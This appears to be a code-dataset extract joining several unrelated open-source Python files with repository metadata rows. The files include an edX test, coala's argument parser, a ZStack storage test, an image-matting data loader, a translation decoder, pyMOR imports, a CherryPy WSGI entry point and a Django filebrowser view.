def test_with_course_data(self, mock_get_current_site):
self.highlights_patcher.stop()
self.highlights_patcher = None
mock_get_current_site.return_value = self.site_config.site
course = CourseFactory(highlights_enabled_for_messaging=True, self_paced=True)
with self.store.bulk_operations(course.id):
ItemFactory.create(parent=course, category='chapter', highlights=[u'highlights'])
enrollment = CourseEnrollmentFactory(course_id=course.id, user=self.user, mode=u'audit')
self.assertEqual(enrollment.schedule.get_experience_type(), ScheduleExperience.EXPERIENCES.course_updates)
_, offset, target_day, _ = self._get_dates(offset=self.expected_offsets[0])
enrollment.schedule.start = target_day
enrollment.schedule.save()
with patch.object(tasks, 'ace') as mock_ace:
self.task().apply(kwargs=dict(
site_id=self.site_config.site.id,
target_day_str=serialize(target_day),
day_offset=offset,
bin_num=self._calculate_bin_for_user(enrollment.user),
))
self.assertTrue(mock_ace.send.called)
| agpl-3.0 | -5,302,609,191,891,175,000 | 42.96 | 126 | 0.734531 | false |
scriptnull/coala | coalib/parsing/DefaultArgParser.py | 1 | 6420 | import argparse
from coalib.misc import Constants
def default_arg_parser(formatter_class=None):
formatter_class = formatter_class or argparse.RawDescriptionHelpFormatter
arg_parser = argparse.ArgumentParser(
formatter_class=formatter_class,
prog="coala",
description="coala is a simple COde AnaLysis Application. Its goal "
"is to make static code analysis easy and convenient "
"for all languages. coala uses bears, which are analaysis "
"routines that can be combined arbitrarily.")
arg_parser.add_argument('TARGETS',
nargs='*',
help="Sections to be executed exclusively.")
arg_parser.add_argument('-c',
'--config',
nargs=1,
metavar='FILE',
help='Configuration file to be used, defaults to '
+ repr(Constants.default_coafile))
FIND_CONFIG_HELP = ('Attempt to find config file by checking parent '
'directories of the current working directory. It is '
'assumed that the config file is named '
+ repr(Constants.default_coafile) + '. This arg is '
'ignored if --config is also given')
arg_parser.add_argument('-F',
'--find-config',
nargs='?',
const=True,
metavar='BOOL',
help=FIND_CONFIG_HELP)
arg_parser.add_argument('-f',
'--files',
nargs='+',
metavar='FILE',
help='Files that should be checked')
arg_parser.add_argument('-i',
'--ignore',
nargs='+',
metavar='FILE',
help='Files that should be ignored')
arg_parser.add_argument('--limit-files',
nargs='+',
metavar='FILE',
help='Files that will be analyzed will be '
'restricted to those in the globs listed '
'in this argument as well the files setting')
arg_parser.add_argument('-b',
'--bears',
nargs='+',
metavar='NAME',
help='Names of bears to use')
BEAR_DIRS_HELP = 'Additional directories where bears may lie'
arg_parser.add_argument('-d',
'--bear-dirs',
nargs='+',
metavar='DIR',
help=BEAR_DIRS_HELP)
LOG_LEVEL_HELP = ("Enum('ERROR','INFO','WARNING','DEBUG') to set level of "
"log output")
arg_parser.add_argument('-L',
'--log-level',
nargs=1,
choices=['ERROR', 'INFO', 'WARNING', 'DEBUG'],
metavar='ENUM',
help=LOG_LEVEL_HELP)
MIN_SEVERITY_HELP = ("Enum('INFO', 'NORMAL', 'MAJOR') to set the minimal "
"result severity.")
arg_parser.add_argument('-m',
'--min-severity',
nargs=1,
choices=('INFO', 'NORMAL', 'MAJOR'),
metavar='ENUM',
help=MIN_SEVERITY_HELP)
SETTINGS_HELP = 'Arbitrary settings in the form of section.key=value'
arg_parser.add_argument('-S',
'--settings',
nargs='+',
metavar='SETTING',
help=SETTINGS_HELP)
SHOW_BEARS_HELP = ("Display bears and its metadata with the sections "
"that they belong to")
arg_parser.add_argument('-B',
'--show-bears',
nargs='?',
const=True,
metavar='BOOL',
help=SHOW_BEARS_HELP)
arg_parser.add_argument('-A',
'--show-all-bears',
nargs='?',
const=True,
metavar='BOOL',
help="Display all bears.")
SAVE_HELP = ('Filename of file to be saved to, if provided with no '
'arguments, settings will be stored back to the file given '
'by -c')
arg_parser.add_argument('-s',
'--save',
nargs='?',
const=True,
metavar='FILE',
help=SAVE_HELP)
TAG_HELP = ('Tag results with a specific name. You can access the results'
' later with that tag.')
arg_parser.add_argument('-t',
'--tag',
nargs='?',
const=True,
metavar='STRING',
help=TAG_HELP)
DELETE_TAG_HELP = 'Delete pre-tagged results with tag name.'
arg_parser.add_argument('-g',
'--dtag',
nargs='?',
const=True,
metavar='STRING',
help=DELETE_TAG_HELP)
arg_parser.add_argument("-j",
"--jobs",
type=int,
help="Number of jobs to use in parallel.")
arg_parser.add_argument('-v',
'--version',
action='version',
version=Constants.VERSION)
arg_parser.add_argument('-n',
'--no-orig',
nargs='?',
const=True,
help="Deactivate creation of .orig files,"
".orig backup files before applying patches")
return arg_parser
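if __name__ == '__main__':
    # Smoke test for the parser (a sketch; the bear name and the setting
    # are illustrative values, the option names are defined above).
    args = default_arg_parser().parse_args(
        ['-f', 'src/*.py', '-b', 'SpaceConsistencyBear',
         '-S', 'default.use_spaces=True'])
    print(args.files, args.bears, args.settings)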
| agpl-3.0 | 3,654,604,630,600,306,000 | 44.211268 | 79 | 0.40405 | false |
zstackio/zstack-woodpecker | integrationtest/vm/multihosts/multiPrimaryStorage/test_one_ps_disabled.py | 1 | 4290 | '''
@author: FangSun
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.primarystorage_operations as ps_ops
import random
_config_ = {
'timeout' : 3000,
'noparallel' : True
}
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
VM_COUNT = 1
VOLUME_NUMBER = 0
new_ps_list = []
disabled_ps_list = []
@test_stub.skip_if_local_shared
def test():
ps_env = test_stub.PSEnvChecker()
if ps_env.is_sb_ceph_env:
env = test_stub.SanAndCephPrimaryStorageEnv(test_object_dict=test_obj_dict,
first_ps_vm_number=VM_COUNT,
second_ps_vm_number=VM_COUNT,
first_ps_volume_number=VOLUME_NUMBER,
second_ps_volume_number=VOLUME_NUMBER)
else:
env = test_stub.TwoPrimaryStorageEnv(test_object_dict=test_obj_dict,
first_ps_vm_number=VM_COUNT,
second_ps_vm_number=VM_COUNT,
first_ps_volume_number=VOLUME_NUMBER,
second_ps_volume_number=VOLUME_NUMBER)
env.check_env()
env.deploy_env()
first_ps_vm_list = env.first_ps_vm_list
first_ps_volume_list = env.first_ps_volume_list
second_ps_vm_list = env.second_ps_vm_list
second_ps_volume_list = env.second_ps_volume_list
if env.new_ps:
new_ps_list.append(env.second_ps)
tbj_list = first_ps_vm_list + second_ps_vm_list + first_ps_volume_list + second_ps_volume_list
test_util.test_dsc('Disable random one Primary Storage')
disabled_ps = random.choice([env.first_ps, env.second_ps])
if disabled_ps is env.first_ps:
enabled_ps = env.second_ps
else:
enabled_ps = env.first_ps
ps_ops.change_primary_storage_state(disabled_ps.uuid, state='disable')
disabled_ps_list.append(disabled_ps)
test_util.test_dsc('make sure all VM and Volumes still OK and running')
for test_object in tbj_list:
test_object.check()
test_util.test_dsc("Try to Create vm in disabeld ps")
with test_stub.expected_failure("Create vm in disabled ps", Exception):
test_stub.create_multi_vms(name_prefix='test-vm', count=1, ps_uuid=disabled_ps.uuid)
test_util.test_dsc("Create 5 vms and check all should be in enabled PS")
if ps_env.is_sb_ceph_env:
        if disabled_ps is env.first_ps:
vm_list = test_stub.create_multi_vms(name_prefix='test_vm', count=5, ps_uuid=enabled_ps.uuid, bs_type="Ceph")
else:
vm_list = test_stub.create_multi_vms(name_prefix='test_vm', count=5, ps_uuid=enabled_ps.uuid, bs_type="ImageStoreBackupStorage")
else:
vm_list = test_stub.create_multi_vms(name_prefix='test_vm', count=5)
for vm in vm_list:
test_obj_dict.add_vm(vm)
for vm in vm_list:
assert vm.get_vm().allVolumes[0].primaryStorageUuid != disabled_ps.uuid
ps_ops.change_primary_storage_state(disabled_ps.uuid, state='enable')
disabled_ps_list.pop()
test_util.test_dsc("Create 1 vms in the recovered ps")
if ps_env.is_sb_ceph_env:
        if disabled_ps is env.first_ps:
vm = test_stub.create_multi_vms(name_prefix='test_vm', count=1, ps_uuid=disabled_ps.uuid, bs_type="ImageStoreBackupStorage")[0]
else:
vm = test_stub.create_multi_vms(name_prefix='test_vm', count=1, ps_uuid=disabled_ps.uuid, bs_type="Ceph")[0]
else:
vm = test_stub.create_multi_vms(name_prefix='test_vm', count=1, ps_uuid=disabled_ps.uuid)[0]
test_obj_dict.add_vm(vm)
test_util.test_pass('Multi PrimaryStorage Test Pass')
def env_recover():
test_lib.lib_error_cleanup(test_obj_dict)
for disabled_ps in disabled_ps_list:
ps_ops.change_primary_storage_state(disabled_ps.uuid, state='enable')
if new_ps_list:
for new_ps in new_ps_list:
ps_ops.detach_primary_storage(new_ps.uuid, new_ps.attachedClusterUuids[0])
ps_ops.delete_primary_storage(new_ps.uuid)
| apache-2.0 | 197,871,456,999,399,580 | 41.475248 | 140 | 0.622378 | false |
PetroWu/AutoPortraitMatting | portrait.py | 1 | 8570 | import numpy as np
import scipy.io as sio
import os
from PIL import Image
class BatchDatset:
imgs = []
max_batch = 0
batch_size = 0
cur_imgs = []
cur_labels = []
cur_batch = 0 # index of batch generated
cur_ind = 0 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['trainlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
self.cur_imgs, self.cur_labels = self.get_variations(self.imgs[0])
def next_batch(self):
while len(self.cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_imgs, tmp_labels = self.get_variations(cur_name)
self.cur_imgs += tmp_imgs
self.cur_labels += tmp_labels
if len(self.cur_imgs) >= self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = self.cur_imgs.pop(0)
ramat[i, :, :, 0] = self.cur_labels.pop(0)
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat
return [], []
def get_variations(self, img_name):
imgs = []
labels = []
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
imgs.append(nimat)
labels.append(namat)
angs = [-45, -22, 22, 45]
gammas = [0.8, 0.9, 1.1, 1.2]
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
i_img = Image.fromarray(np.uint8(org_mat))
a_img = Image.fromarray(np.uint8(amat))
for i in range(4):
tmpi_img = i_img.rotate(angs[i])
tmpa_img = a_img.rotate(angs[i])
tmpri_img = np.array(tmpi_img, dtype=np.int)
rimat = np.zeros(tmpri_img.shape, dtype=np.float)
for k in range(h):
for j in range(w):
rimat[k][j][0] = (tmpri_img[k][j][2] * 1.0 - 104.008) / 255
rimat[k][j][1] = (tmpri_img[k][j][1] * 1.0 - 116.669) / 255
rimat[k][j][2] = (tmpri_img[k][j][0] * 1.0 - 122.675) / 255
imgs.append(rimat)
labels.append(np.array(tmpa_img, dtype=np.int))
tmp_nimat = np.array(imat, dtype=np.float)
tmp_nimat[:, :, 0] = tmp_nimat[:, :, 0] * 255 + 104.01
tmp_nimat[:, :, 0] = (pow(tmp_nimat[:, :, 0], gammas[i]) - pow(104.01, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 1] = tmp_nimat[:, :, 1] * 255 + 116.67
tmp_nimat[:, :, 1] = (pow(tmp_nimat[:, :, 1], gammas[i]) - pow(116.67, gammas[i])) / pow(255, gammas[i])
tmp_nimat[:, :, 2] = tmp_nimat[:, :, 2] * 255 + 122.68
tmp_nimat[:, :, 2] = (pow(tmp_nimat[:, :, 2], gammas[i]) - pow(122.68, gammas[i])) / pow(255, gammas[i])
imgs.append(tmp_nimat)
labels.append(namat)
return imgs, labels
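# The nested per-pixel loops above are straightforward but slow in pure
# Python. A vectorized NumPy equivalent (a sketch, not used by the classes
# here) recovers the RGB image in one shot; the channel offsets match the
# constants used in the loops.
def normalized_to_rgb(nimat):
    # Channels are stored as (value - offset) / 255 in B, G, R order
    # relative to RGB, hence the [:, :, ::-1] flip before adding offsets.
    offsets = np.array([122.675, 116.669, 104.008])
    return np.uint8(np.round(nimat[:, :, ::-1] * 255 + offsets))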
class TestDataset:
imgs = []
max_batch = 0
batch_size = 0
cur_batch = 0 # index of batch generated
cur_ind = -1 # index of current image in imgs
img_width = 600
img_height = 800
def __init__(self, imgs_path, batch_size=2):
self.imgs = sio.loadmat(imgs_path)['testlist'][0]
#self.labels = sio.loadmat(labels_path)['test_list'][0]
self.batch_size = batch_size
#self.max_batch = len(self.imgs) * 9 / batch_size
#self.cur_imgs, self.cur_labels = self.get_images(self.imgs[0])
def next_batch(self):
cur_imgs = []
cur_labels = []
cur_orgs = []
while len(cur_imgs) < self.batch_size: # if not enough, get the next image
self.cur_ind += 1
#print('appending', self.cur_ind)
if self.cur_ind >= len(self.imgs):
#print('leaving', self.cur_ind)
break
cur_name = self.imgs[self.cur_ind]
tmp_img, tmp_label, tmp_org = self.get_images(cur_name)
if tmp_img is not None:
cur_imgs.append(tmp_img)
cur_labels.append(tmp_label)
cur_orgs.append(tmp_org)
if len(cur_imgs) == self.batch_size:
#print('getting', self.cur_ind)
rimat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.float)
org_mat = np.zeros((self.batch_size, self.img_height, self.img_width, 3), dtype=np.int)
ramat = np.zeros((self.batch_size, self.img_height, self.img_width, 1), dtype=np.int)
self.cur_batch += 1 # output a new batch
for i in range(self.batch_size):
rimat[i] = cur_imgs.pop(0)
org_mat[i] = cur_orgs.pop(0)
ramat[i, :, :, 0] = cur_labels.pop(0)
#print('getting', ramat[0, 200:210, 200:220])
#print('batch:', self.cur_batch, 'at img:', self.imgs[self.cur_ind], 'generate image shape', rimat.shape, 'and label shape', ramat.shape)
return rimat, ramat, org_mat
return [], [], []
def get_images(self, img_name):
stp = str(img_name)
if img_name < 10:
stp = '0000' + stp
elif img_name < 100:
stp = '000' + stp
elif img_name < 1000:
stp = '00' + stp
else:
stp = '0' + stp
img_path = 'data/portraitFCN_data/' + stp + '.mat'
alpha_path = 'data/images_mask/' + stp + '_mask.mat'
if os.path.exists(img_path) and os.path.exists(alpha_path):
imat = sio.loadmat(img_path)['img']
amat = sio.loadmat(alpha_path)['mask']
nimat = np.array(imat, dtype=np.float)
namat = np.array(amat, dtype=np.int)
org_mat = np.zeros(nimat.shape, dtype=np.int)
h, w, _ = nimat.shape
for i in range(h):
for j in range(w):
org_mat[i][j][0] = round(nimat[i][j][2] * 255 + 122.675)
org_mat[i][j][1] = round(nimat[i][j][1] * 255 + 116.669)
org_mat[i][j][2] = round(nimat[i][j][0] * 255 + 104.008)
return nimat, namat, org_mat
return None, None, None
if __name__ == '__main__':
data = BatchDatset('data/trainlist.mat')
'''ri, ra = data.next_batch()
while len(ri) != 0:
ri, ra = data.next_batch()
print(np.sum(ra))'''
imgs, labels = data.get_variations(47)
cnt = 0
for img in imgs:
mat = np.zeros(img.shape, dtype=np.int)
h, w, _ = img.shape
for i in range(h):
for j in range(w):
mat[i][j][0] = round(img[i][j][2] * 255 + 122.675)
mat[i][j][1] = round(img[i][j][1] * 255 + 116.669)
mat[i][j][2] = round(img[i][j][0] * 255 + 104.008)
im = Image.fromarray(np.uint8(mat))
im.save('img-'+str(cnt)+'.jpg')
cnt += 1
| apache-2.0 | 5,070,734,809,259,799,000 | 42.72449 | 149 | 0.502684 | false |
query/mt-submissions | hw2-decoding/decode.py | 1 | 7691 | #!/usr/bin/env python
"""A translation decoder."""
from collections import defaultdict, namedtuple
import models
Hypothesis = namedtuple('Hypothesis',
['logprob', 'future_cost', 'coverage',
'lm_state', 'predecessor', 'candidate'])
def decode(tm, lm, source_sentence,
stack_size=1, max_reordering=None):
"""Return the most probable decoding of *source_sentence* under the
provided probabilistic translation and language models."""
# Compute the future cost table.
future_costs = {}
for segment_length in xrange(1, len(source_sentence) + 1):
for start in xrange(len(source_sentence) - segment_length + 1):
end = start + segment_length
future_costs[(start, end)] = float('-inf')
candidates = tm.get(source_sentence[start:end], [])
if candidates:
logprob = candidates[0].logprob
lm_state = tuple()
for target_word in candidates[0].english.split():
lm_state, word_logprob = lm.score(lm_state, target_word)
logprob += word_logprob
future_costs[(start, end)] = logprob
for mid in xrange(start + 1, end):
future_costs[(start, end)] = max(
future_costs[(start, mid)] + future_costs[(mid, end)],
future_costs[(start, end)])
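    # future_costs[(start, end)] now estimates the best log-probability of
    # covering source_sentence[start:end], either with a single phrase or by
    # splitting at a midpoint -- a future-cost table that deliberately
    # ignores reordering and LM context across the split.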
# Actually start decoding.
initial = Hypothesis(0.0, future_costs[(0, len(source_sentence))],
(False,) * len(source_sentence),
lm.begin(), None, None)
# We add 1 here because we need to have stacks for both ends: 0 and
# len(source_sentence).
stacks = [{} for _ in xrange(len(source_sentence) + 1)]
stacks[0][lm.begin()] = initial
# Iterate over every stack but the last. It's not possible to add
# anything to a hypothesis in the last stack anyway, so we skip it.
for i, stack in enumerate(stacks[:-1]):
# Take only the best *stack_size* hypotheses. Using the sum of
# the log-probability and the future cost negatively impacts the
# model score (??).
hypotheses = sorted(stack.itervalues(),
key=lambda h: -h.logprob)[:stack_size]
for hypothesis in hypotheses:
# Save ourselves a couple of levels of indentation later on.
def untranslated_segments():
if max_reordering is None:
starts = xrange(len(source_sentence))
else:
starts = xrange(min(i + max_reordering,
len(source_sentence)))
for start in starts:
if hypothesis.coverage[start]:
continue
ends = xrange(start, len(source_sentence))
for end in ends:
if hypothesis.coverage[end]:
break
yield (start, end + 1)
# Iterate over blocks of untranslated source words.
for start, end in untranslated_segments():
source_phrase = source_sentence[start:end]
# Get all of the potential candidate translations.
candidates = tm.get(source_phrase, [])
# Translate unknown unigrams to themselves.
if not candidates and len(source_phrase) == 1:
candidates.append(models.phrase(source_phrase[0], 0.0))
for candidate in candidates:
logprob = hypothesis.logprob + candidate.logprob
# Make a new coverage vector with the appropriate
# elements set to True. This isn't pretty. Sorry.
coverage = (hypothesis.coverage[:start] +
(True,) * (end - start) +
hypothesis.coverage[end:])
# Find the future cost estimate for this hypothesis
# by summing over contiguous incomplete segments.
future_cost = 0.0
cost_start = None
for cost_i, covered in enumerate(coverage + (True,)):
if covered:
if cost_start is not None:
future_cost += \
future_costs[(cost_start, cost_i)]
cost_start = None
else:
if cost_start is None:
cost_start = cost_i
# Make a new LM state.
lm_state = hypothesis.lm_state
for target_word in candidate.english.split():
lm_state, word_logprob = \
lm.score(lm_state, target_word)
logprob += word_logprob
# Add the final transition probability if the end of
# this segment is also the end of the sentence.
if end == len(source_sentence):
logprob += lm.end(lm_state)
# If the new hypothesis is the best hypothesis for
# its state and number of completed words, push it
# onto the stack, replacing any that is present.
completed = sum(int(x) for x in coverage)
if (lm_state not in stacks[completed] or
(stacks[completed][lm_state].logprob +
stacks[completed][lm_state].future_cost) <
logprob + future_cost):
stacks[completed][lm_state] = Hypothesis(
logprob, future_cost, coverage,
lm_state, hypothesis, candidate)
# We don't need to specify a key, since we're looking for the best
# log-probability, and that's the first element of a hypothesis.
best = max(stacks[-1].itervalues())
current = best
decoding = []
while current.candidate:
decoding.insert(0, current.candidate.english)
current = current.predecessor
return tuple(decoding)
def main():
import argparse
parser = argparse.ArgumentParser(
description='A translation decoder.')
parser.add_argument(
'tm_path', metavar='TM',
help='path to translation model')
parser.add_argument(
'lm_path', metavar='LM',
help='path to language model')
parser.add_argument(
'input_file', metavar='INPUT', type=argparse.FileType('r'),
help='path to file containing sentences to decode')
parser.add_argument(
'-k', '--max-candidates', type=int, default=1,
help='maximum number of translation candidates to consider for '
'each phrase')
parser.add_argument(
'-r', '--max-reordering', type=int,
help='maximum number of source words that can be skipped '
'during reordering')
parser.add_argument(
'-s', '--stack-size', type=int, default=1,
help='maximum hypothesis stack size')
args = parser.parse_args()
tm = models.TM(args.tm_path, args.max_candidates)
lm = models.LM(args.lm_path)
for source_line in args.input_file:
source_sentence = tuple(source_line.split())
print ' '.join(decode(tm, lm, source_sentence,
stack_size=args.stack_size,
max_reordering=args.max_reordering))
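# Example invocation (hypothetical file names; the flags match the argparse
# definitions above):
#
#   python decode.py data/tm data/lm.gz data/input -k 5 -s 100 -r 4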
if __name__ == '__main__':
main()
| mit | -7,950,587,443,624,482,000 | 45.896341 | 76 | 0.52854 | false |
michaellaier/pymor | src/pymor/basic.py | 1 | 3271 | # This file is part of the pyMOR project (http://www.pymor.org).
# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
"""This module imports some commonly used methods and classes.
You can use ``from pymor.basic import *`` in interactive session
to have the most important parts of pyMOR directly available.
"""
from pymor.algorithms.basisextension import trivial_basis_extension, gram_schmidt_basis_extension, pod_basis_extension
from pymor.algorithms.ei import interpolate_operators, ei_greedy, deim
from pymor.algorithms.greedy import greedy
from pymor.analyticalproblems.advection import InstationaryAdvectionProblem
from pymor.analyticalproblems.burgers import BurgersProblem, Burgers2DProblem
from pymor.analyticalproblems.elliptic import EllipticProblem
from pymor.analyticalproblems.thermalblock import ThermalBlockProblem
from pymor.core.cache import clear_caches, enable_caching, disable_caching
from pymor.core.defaults import print_defaults, write_defaults_to_file, load_defaults_from_file, set_defaults
from pymor.core.logger import set_log_levels, getLogger
from pymor.core.pickle import dump, dumps, load, loads
from pymor.discretizations.basic import StationaryDiscretization, InstationaryDiscretization
from pymor.domaindescriptions.basic import RectDomain, CylindricalDomain, TorusDomain, LineDomain, CircleDomain
from pymor.domaindescriptions.boundarytypes import BoundaryType
from pymor.domaindiscretizers.default import discretize_domain_default
from pymor.discretizers.advection import discretize_nonlinear_instationary_advection_fv
from pymor.discretizers.elliptic import discretize_elliptic_cg, discretize_elliptic_fv
from pymor.functions.basic import ConstantFunction, GenericFunction, ExpressionFunction, LincombFunction
from pymor.grids.boundaryinfos import EmptyBoundaryInfo, BoundaryInfoFromIndicators, AllDirichletBoundaryInfo
from pymor.grids.oned import OnedGrid
from pymor.grids.rect import RectGrid
from pymor.grids.tria import TriaGrid
from pymor.la.basic import induced_norm, cat_arrays
from pymor.la.gram_schmidt import gram_schmidt
from pymor.la.interfaces import VectorSpace
from pymor.la.numpyvectorarray import NumpyVectorArray, NumpyVectorSpace
from pymor.la.pod import pod
from pymor.operators.numpy import NumpyGenericOperator, NumpyMatrixOperator
from pymor.operators.constructions import (LincombOperator, Concatenation, ComponentProjection, IdentityOperator,
ConstantOperator, VectorArrayOperator, VectorOperator, VectorFunctional,
FixedParameterOperator)
from pymor.operators.ei import EmpiricalInterpolatedOperator
from pymor.parameters.base import Parameter
from pymor.parameters.functionals import (ProjectionParameterFunctional, GenericParameterFunctional,
ExpressionParameterFunctional)
from pymor.parameters.spaces import CubicParameterSpace
from pymor.reductors.basic import reduce_generic_rb, reduce_to_subbasis
from pymor.reductors.stationary import reduce_stationary_coercive
from pymor.tools.floatcmp import float_cmp, float_cmp_all
from pymor.tools.random import new_random_state
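# Example interactive session using only names imported above (a sketch;
# the parameter values are illustrative):
#
#   p = ThermalBlockProblem(num_blocks=(2, 2))
#   d, data = discretize_elliptic_cg(p, diameter=1. / 50.)
#   U = d.solve(mu=(1., 0.1, 0.1, 1.))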
| bsd-2-clause | 1,916,091,494,274,894,800 | 50.920635 | 118 | 0.819016 | false |
paolodoz/timesheet | embedded/modwsgi.py | 1 | 1518 | #!/usr/bin/env python
import cherrypy, logging
import sys, os
import atexit
# This file is assumed to live one directory below the installation root.
installation_path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.insert(0, installation_path)
from core.routes.routes import Routes
from core.config import conf_server, conf_static, conf_logging
def secureheaders():
headers = cherrypy.response.headers
headers['X-Frame-Options'] = 'DENY'
headers['X-XSS-Protection'] = '1; mode=block'
headers['Content-Security-Policy'] = "default-src='self'"
# Update configurations
# If log paths are absolute, move to current path
if not os.path.isabs(conf_server['log.access_file']):
conf_server['log.access_file'] = os.path.join(installation_path, conf_server['log.access_file'])
if not os.path.isabs(conf_server['log.error_file']):
conf_server['log.error_file'] = os.path.join(installation_path, conf_server['log.error_file'])
conf_server['environment'] = 'embedded'
cherrypy.config.update(conf_server)
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
for logname, loglevel in conf_logging.items():
logging_level = getattr(logging, loglevel)
cherrypy_log = getattr(cherrypy.log, logname)
cherrypy_log.setLevel(logging_level)
cherrypy.tools.secureheaders = cherrypy.Tool('before_finalize', secureheaders, priority=60)
routes = Routes()
application = cherrypy.Application(routes, config=conf_static)
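# Example Apache mod_wsgi configuration for this entry point (a sketch; all
# paths are hypothetical):
#
#   WSGIScriptAlias /timesheet /opt/timesheet/embedded/modwsgi.py
#   WSGIDaemonProcess timesheet python-path=/opt/timesheet
#   WSGIProcessGroup timesheet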
| gpl-2.0 | -6,801,214,810,711,781,000 | 35.142857 | 100 | 0.732543 | false |
dwaiter/django-filebrowser-old | filebrowser/views.py | 1 | 19478 | # coding: utf-8
# general imports
import itertools, os, re
from time import gmtime, strftime
# django imports
from django.shortcuts import render_to_response, HttpResponse
from django.template import RequestContext as Context
from django.http import HttpResponseRedirect
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from django.conf import settings
from django import forms
from django.core.urlresolvers import reverse
from django.core.exceptions import ImproperlyConfigured
from django.dispatch import Signal
from django.core.paginator import Paginator, InvalidPage, EmptyPage
try:
# django SVN
from django.views.decorators.csrf import csrf_exempt
except:
# django 1.1
from django.contrib.csrf.middleware import csrf_exempt
# filebrowser imports
from filebrowser.settings import *
from filebrowser.functions import path_to_url, sort_by_attr, get_path, get_file, get_version_path, get_breadcrumbs, get_filterdate, get_settings_var, handle_file_upload, convert_filename
from filebrowser.templatetags.fb_tags import query_helper
from filebrowser.base import FileObject
from filebrowser.decorators import flash_login_required
# Precompile regular expressions
filter_re = []
for exp in EXCLUDE:
filter_re.append(re.compile(exp))
for k,v in VERSIONS.iteritems():
exp = (r'_%s.(%s)') % (k, '|'.join(EXTENSION_LIST))
filter_re.append(re.compile(exp))
def browse(request):
"""
Browse Files/Directories.
"""
# QUERY / PATH CHECK
query = request.GET.copy()
path = get_path(query.get('dir', ''))
directory = get_path('')
q = request.GET.get('q')
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
if directory is None:
# The DIRECTORY does not exist, raise an error to prevent eternal redirecting.
raise ImproperlyConfigured, _("Error finding Upload-Folder. Maybe it does not exist?")
redirect_url = reverse("fb_browse") + query_helper(query, "", "dir")
return HttpResponseRedirect(redirect_url)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# INITIAL VARIABLES
results_var = {'results_total': 0, 'results_current': 0, 'delete_total': 0, 'images_total': 0, 'select_total': 0 }
counter = {}
for k,v in EXTENSIONS.iteritems():
counter[k] = 0
if q:
m_root = os.path.normpath(MEDIA_ROOT)
dirs = [
[(os.path.normpath(root)[len(m_root)+1:], f) for f in filenames]
for root, _subdirs, filenames in os.walk(abs_path)
]
dir_list = itertools.chain(*dirs)
else:
root = os.path.join(DIRECTORY, path)
dir_list = ((root, f) for f in os.listdir(abs_path))
files = []
for file_dir, file in dir_list:
# EXCLUDE FILES MATCHING VERSIONS_PREFIX OR ANY OF THE EXCLUDE PATTERNS
filtered = file.startswith('.')
for re_prefix in filter_re:
if re_prefix.search(file):
filtered = True
if filtered:
continue
results_var['results_total'] += 1
# CREATE FILEOBJECT
fileobject = FileObject(os.path.join(file_dir, file))
# FILTER / SEARCH
append = False
if fileobject.filetype == request.GET.get('filter_type', fileobject.filetype) and get_filterdate(request.GET.get('filter_date', ''), fileobject.date or 0):
append = True
if q and not re.compile(q.lower(), re.M).search(file.lower()):
append = False
# APPEND FILE_LIST
if append:
try:
# COUNTER/RESULTS
if fileobject.filetype == 'Image':
results_var['images_total'] += 1
if fileobject.filetype != 'Folder':
results_var['delete_total'] += 1
elif fileobject.filetype == 'Folder' and fileobject.is_empty:
results_var['delete_total'] += 1
if query.get('type') and query.get('type') in SELECT_FORMATS and fileobject.filetype in SELECT_FORMATS[query.get('type')]:
results_var['select_total'] += 1
elif not query.get('type'):
results_var['select_total'] += 1
except OSError:
# Ignore items that have problems
continue
else:
files.append(fileobject)
results_var['results_current'] += 1
# COUNTER/RESULTS
if fileobject.filetype:
counter[fileobject.filetype] += 1
# SORTING
query['o'] = request.GET.get('o', DEFAULT_SORTING_BY)
query['ot'] = request.GET.get('ot', DEFAULT_SORTING_ORDER)
folders = [f for f in files if f.filetype == 'Folder']
folders = sort_by_attr(folders, 'filename')
files = [f for f in files if f.filetype != 'Folder']
files = sort_by_attr(files, request.GET.get('o', DEFAULT_SORTING_BY))
if not request.GET.get('ot') and DEFAULT_SORTING_ORDER == "desc" or request.GET.get('ot') == "desc":
files.reverse()
